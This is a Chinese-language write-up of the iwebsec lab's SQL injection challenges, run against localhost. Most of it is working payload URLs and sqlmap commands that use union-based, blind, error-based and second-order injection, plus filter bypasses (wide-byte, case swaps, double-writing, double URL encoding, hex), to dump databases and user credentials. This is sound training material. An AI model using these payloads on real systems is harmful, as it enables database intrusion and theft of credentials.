绕过wafmysql爆库_iwebsec刷题记录SQL注入漏洞

被推荐了这个web平台&＃xff0c;感觉挺适合新手的&＃xff0c;网上搜了下没看到有人写wp&＃xff0c;这里本入门萌新来稍微整理下自己解题的过程

SQL注入漏洞

01-数字型注入

http://localhost:32774/sqli/01.php?id&＃61;1&＃39;

发现有报错

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’ LIMIT 0,1’ at line 1

猜测语句

WHERE id&＃61;$id LIMIT 0,1

验证一下

查列数

查显示位

爆库

http://localhost:32774/sqli/01.php?id&＃61;1%20union%20select%201,2,group_concat(schema_name)%20from%20information_schema.schemata%20--&＃43;

爆表

http://localhost:32774/sqli/01.php?id&＃61;1%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema&＃61;database())%20--&＃43;

爆列

http://localhost:32774/sqli/01.php?id&＃61;1%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema%20&＃61;database()%20and%20table_name&＃61;%27users%27)%20--&＃43;

爆数据

http://localhost:32774/sqli/01.php?id&＃61;1%20union%20select%201,2,(select%20group_concat(concat(role,0x7e,username,0x3A,password,0x7e))%20from%20users)%20%20--&＃43;

02-字符型注入

http://localhost:32774/sqli/02.php?id&＃61;1&＃39; or &＃39;1&＃61;2–&＃39;

报错

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’1’ or ’1&＃61;2–’’ LIMIT 0,1’ at line 1

看源码&＃xff0c;发现SET NAMES gbk猜测宽字节注入

尝试

http://localhost:32774/sqli/02.php?id&＃61;1%df&＃39; and 1&＃61;2 union select 1,2,3 --&＃43;

爆库

http://localhost:32774/sqli/02.php?id&＃61;1%df&＃39; and 1&＃61;2 union select 1,2,group_concat(schema_name) from information_schema.schemata --&＃43;

爆表

http://localhost:32774/sqli/02.php?id&＃61;1%df&＃39; and 1&＃61;2 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema&＃61;database()) --&＃43;

爆数据

http://localhost:32774/sqli/02.php?id&＃61;1%df&＃39; and 1&＃61;2 union select 1,2,(select group_concat(concat(role,0x7e,username,0x3A,password,0x7e)) from users) --&＃43;

这里除了前面通过宽字节来让mysql以为是个汉字绕过检查其他和第一题一样

03-bool注入

http://localhost:32774/sqli/03.php?id&＃61;1 and 1&＃61;2 --&＃43;

检测出来存在是布尔注入就懒得写jio本了&＃xff0c;sqlmap直接梭

爆库

sqlmap -u http://localhost:32774/sqli/03.php?id&＃61;1 --current-db

爆表

sqlmap -u http://localhost:32774/sqli/03.php?id&＃61;1 -D iwebsec --tables

爆列

sqlmap -u http://localhost:32774/sqli/03.php?id&＃61;1 -D iwebsec -T users --columns

爆数据

sqlmap -u http://localhost:32774/sqli/03.php?id&＃61;1 -D iwebsec -T users -C role,username,password --dump

04-sleep注入

自己的脚本真的很丑&＃xff0c;这里就不丢脸了

时间盲注爆库

sqlmap -u http://localhost:32774/sqli/04.php?id&＃61;1 -p id --technique T --time-sec 3 --current-db

爆表

sqlmap -u http://localhost:32774/sqli/04.php?id&＃61;1 -p id --technique T --time-sec 3 -D iwebsec --tables

爆列

sqlmap -u http://localhost:32774/sqli/04.php?id&＃61;1 -p id --technique T --time-sec 3 -D iwebsec -T user --columns

爆数据

sqlmap -u http://localhost:32774/sqli/04.php?id&＃61;1 -p id --technique T --time-sec 3 -D iwebsec -T user -C id,password,username --dump

05-updatexml注入

这题限制条件没弄好&＃xff0c;用第一题的payload都能跑

但还是用题目的预期过一遍

and (updatexml(1,concat(0x7e,(select version()),0x7e),1))

先检验

http://localhost:32774/sqli/05.php?id&＃61;1 and (updatexml(1,concat(0x7e,(select version()),0x7e),1))

存在注入&＃xff0c;并使用updatexml函数注入

爆库

http://localhost:32774/sqli/05.php?id&＃61;1 and (updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1))

爆表

http://localhost:32774/sqli/05.php?id&＃61;1 and (updatexml(1,concat(0x7e,(select (select group_concat(table_name) from information_schema.tables where table_schema&＃61;database())),0x7e),1))

爆列

http://localhost:32774/sqli/05.php?id&＃61;1 and (updatexml(1,concat(0x7e,(select (select group_concat(column_name) from information_schema.columns where table_schema &＃61;database() and table_name&＃61;&＃39;users&＃39;)),0x7e),1))

爆数据

http://localhost:32774/sqli/05.php?id&＃61;1 and (updatexml(1,concat(0x7e,(select (select group_concat(concat(role,0x7e,username,0x3A,password,0x7e)) from users)),0x7e),1))

06-宽字节注入

这题看题目就是宽字节&＃xff0c;和之前第二题的做法重了&＃xff0c;就换个方法&＃xff0c;用sqlmap过一遍

这里需要知道的是直接

sqlmap -u http://localhost:32774/sqli/06.php?id&＃61;1

是找不到注入的,需要

sqlmap -u http://localhost:32774/sqli/06.php?id&＃61;1%df%27

或者使用tamper&＃61;”unmagicquotes”

sqlmap -u "http://localhost:32774/sqli/06.php?id&＃61;1" --tamper&＃61;"unmagicquotes" --current-db

爆库

sqlmap -u "http://localhost:32774/sqli/06.php?id&＃61;1" --tamper&＃61;"unmagicquotes" --current-db

爆表

sqlmap -u "http://localhost:32774/sqli/06.php?id&＃61;1" --tamper&＃61;"unmagicquotes" -D iwebsec --tables

爆列

sqlmap -u "http://localhost:32774/sqli/06.php?id&＃61;1" --tamper&＃61;"unmagicquotes" -D iwebsec -T users --colums

爆数据

sqlmap -u "http://localhost:32774/sqli/06.php?id&＃61;1" --tamper&＃61;"unmagicquotes" -D iwebsec -T users -C role,username,password --dump

07-空格过滤绕过

看题可知过滤了空格&＃xff0c;这里我选择用括号让参数之间没有空格

http://localhost:32774/sqli/07.php?id&＃61;(0)or(1)&＃61;(1)

查显示位

http://localhost:32774/sqli/07.php?id&＃61;(0)%0aunion%0aselect(1),(2),(3)

爆库

http://localhost:32774/sqli/07.php?id&＃61;(0)%0Aunion%0Aselect(1),(2),(select%0Agroup_concat(schema_name)%0Afrom%0Ainformation_schema.schemata)

爆表

localhost:32774/sqli/07.php?id&＃61;(0)%0Aunion%0Aselect(1),(2),(select%0Agroup_concat(table_name)%0Afrom%0Ainformation_schema.tables%0Awhere%0Atable_schema&＃61;database())

爆列

http://localhost:32774/sqli/07.php?id&＃61;(0)%0Aunion%0Aselect(1),(2),(select%0Agroup_concat(column_name)%0Afrom%0Ainformation_schema.columns%0awhere%0atable_schema&＃61;database()and(table_name&＃61;&＃39;users&＃39;))

爆数据

http://localhost:32774/sqli/07.php?id&＃61;(0)%0Aunion%0Aselect(1),(2),(select%0Agroup_concat(concat(role,0x7e,username,0x3A,password,0x7e))%0Afrom%0Ausers)

08-大小写过滤绕过

常规测试后发现测试点在select上&＃xff0c;根据题目只要对select进行大小写变换就行

显示位

爆库

http://localhost:32774/sqli/08.php?id&＃61;1 union Select 1,2,group_concat(schema_name) from information_schema.schemata--&＃43;

爆表

http://localhost:32774/sqli/08.php?id&＃61;1 union Select 1,2,(Select group_concat(table_name) from information_schema.tables where table_schema&＃61;database())--&＃43;

爆列

http://localhost:32774/sqli/08.php?id&＃61;1 union Select 1,2,(Select group_concat(column_name) from information_schema.columns where table_schema &＃61;database() and table_name&＃61;&＃39;users&＃39;)--&＃43;

爆数据

http://localhost:32774/sqli/08.php?id&＃61;1 union Select 1,2,(Select group_concat(concat(role,0x7e,username,0x3A,password,0x7e)) from users)--&＃43;

09-双写关键字绕过

确认存在注入

发现过滤了select字符串&＃xff0c;题目可得需要用双写来绕过&＃xff0c;试一下

http://localhost:32774/sqli/09.php?id&＃61;1 union seselectlect 1,2,3--&＃43;

绕过的原因

因为在匹配到”se”&＃43;”select”&＃43;”lect”中的select后替换为空后前后拼接起来就是select成功的绕过唯一一次检验

爆库

http://localhost:32774/sqli/09.php?id&＃61;1 union seselectlect 1,2,group_concat(schema_name) from information_schema.schemata--&＃43;

爆表

http://localhost:32774/sqli/09.php?id&＃61;1 union seselectlect 1,2,(seselectlect group_concat(table_name) from information_schema.tables where table_schema&＃61;database())--&＃43;

爆列

http://localhost:32774/sqli/09.php?id&＃61;1 union seselectlect 1,2,(seselectlect group_concat(column_name) from information_schema.columns where table_schema &＃61;database() and table_name&＃61;&＃39;users&＃39;)--&＃43;

爆数据

http://localhost:32774/sqli/09.php?id&＃61;1 union seselectlect 1,2,(seselectlect group_concat(concat(role,0x7e,username,0x3A,password,0x7e)) from users)--&＃43;

10-双重url编码绕过

根据题目可以猜到源码对$id进行了一次urldecode&＃xff0c;在测试的过程中还能发现对select进行了waf&＃xff0c;所以只需要根据第八题的payload进行两次urlencode即可

脚本

a &＃61; ""

print urllib.quote(urllib.quote(a))

本以为是这样的

结果完全没派上用场&＃xff0c;第八题的语句完全照搬都能跑得通

但出于对题目的尊重还是用双重url编码绕过一下吧

爆库

原句

1 union Select 1,2,group_concat(schema_name) from information_schema.schemata#

编码后

1%2520union%2520Select%25201%252C2%252Cgroup_concat%2528schema_name%2529%2520from%2520information_schema.schemata%2523

最终

http://localhost:32774/sqli/10.php?id&＃61;1%2520union%2520Select%25201%252C2%252Cgroup_concat%2528schema_name%2529%2520from%2520information_schema.schemata%2523

爆表

原句

1 union Select 1,2,(Select group_concat(table_name) from information_schema.tables where table_schema&＃61;database())#

编码后

1%2520union%2520Select%25201%252C2%252C%2528Select%2520group_concat%2528table_name%2529%2520from%2520information_schema.tables%2520where%2520table_schema%253Ddatabase%2528%2529%2529%2523

最终

http://localhost:32774/sqli/10.php?id&＃61;1%2520union%2520Select%25201%252C2%252C%2528Select%2520group_concat%2528table_name%2529%2520from%2520information_schema.tables%2520where%2520table_schema%253Ddatabase%2528%2529%2529%2523

爆列

原句

1 union Select 1,2,(Select group_concat(column_name) from information_schema.columns where table_schema &＃61;database() and table_name&＃61;&＃39;users&＃39;)#

编码后

1%2520union%2520Select%25201%252C2%252C%2528Select%2520group_concat%2528column_name%2529%2520from%2520information_schema.columns%2520where%2520table_schema%2520%253Ddatabase%2528%2529%2520and%2520table_name%253D%2527users%2527%2529%2523

最终

http://localhost:32774/sqli/10.php?id&＃61;1%2520union%2520Select%25201%252C2%252C%2528Select%2520group_concat%2528column_name%2529%2520from%2520information_schema.columns%2520where%2520table_schema%2520%253Ddatabase%2528%2529%2520and%2520table_name%253D%2527users%2527%2529%2523

爆数据

原句

1 union Select 1,2,(Select group_concat(concat(role,0x7e,username,0x3A,password,0x7e)) from users) #

编码后

1%2520union%2520Select%25201%252C2%252C%2528Select%2520group_concat%2528concat%2528role%252C0x7e%252Cusername%252C0x3A%252Cpassword%252C0x7e%2529%2529%2520from%2520users%2529%2520%2523

最终

http://localhost:32774/sqli/10.php?id&＃61;1%2520union%2520Select%25201%252C2%252C%2528Select%2520group_concat%2528concat%2528role%252C0x7e%252Cusername%252C0x3A%252Cpassword%252C0x7e%2529%2529%2520from%2520users%2529%2520%2523

11-十六进制绕过

先按正常步骤去做

查显示位

http://localhost:32774/sqli/11.php?id&＃61;1%20union%20select%201,2,3--&＃43;

爆库

localhost:32774/sqli/11.php?id&＃61;1 union select 1,2,group_concat(schema_name) from information_schema.schemata--&＃43;

爆表

localhost:32774/sqli/11.php?id&＃61;1 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema&＃61;database())--&＃43;

查列的时候问题就来了&＃xff0c;发现引号被过滤了

这里就考虑到使用user的十六进制绕过限制

爆列

http://localhost:32774/sqli/11.php?id&＃61;1 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema &＃61;database() and table_name&＃61;0x75736572)--&＃43;

爆数据

http://localhost:32774/sqli/11.php?id&＃61;1 union select 1,2,(select group_concat(concat(id,0x7e,username,0x3A,password,0x7e)) from user) --&＃43;

12-等价函数替换过滤绕过

简单尝试后可知对等号进行了waf&＃xff0c;那么爆库的语句还是正常的

http://localhost:32774/sqli/12.php?id&＃61;1 union select 1,2,group_concat(schema_name) from information_schema.schemata--&＃43;

这里就根据题目&＃xff0c;使用与等号等价的函数进行替换&＃xff0c;这里我选择用like&＃xff0c;因为如果没有使用百分号,like子句与等号的效果是一样的

爆表

http://localhost:32774/sqli/12.php?id&＃61;1 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema like database())--&＃43;

爆列

http://localhost:32774/sqli/12.php?id&＃61;1 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema like database() and table_name like &＃39;users&＃39;)--&＃43;

爆数据

http://localhost:32774/sqli/12.php?id&＃61;1 union select 1,2,(select group_concat(concat(role,0x7e,username,0x3A,password,0x7e)) from users) --&＃43;

13-二次注入

这题其实挺简单的&＃xff0c;简单的整理下流程

1.注册用户&＃xff0c;输入username&＃xff0c;password&＃xff0c;email

2.找回密码&＃xff0c;输入存在的邮箱即可返回用户名和密码

那么问题来了&＃xff0c;这是一道注入题&＃xff0c;从注入的角度来说应该是在username放入查询语句再通过找回密码来执行

但由于我很懒&＃xff0c;我选择直接用万能密码法

这样就会使查询语句查的是admin而不是admin&＃39;#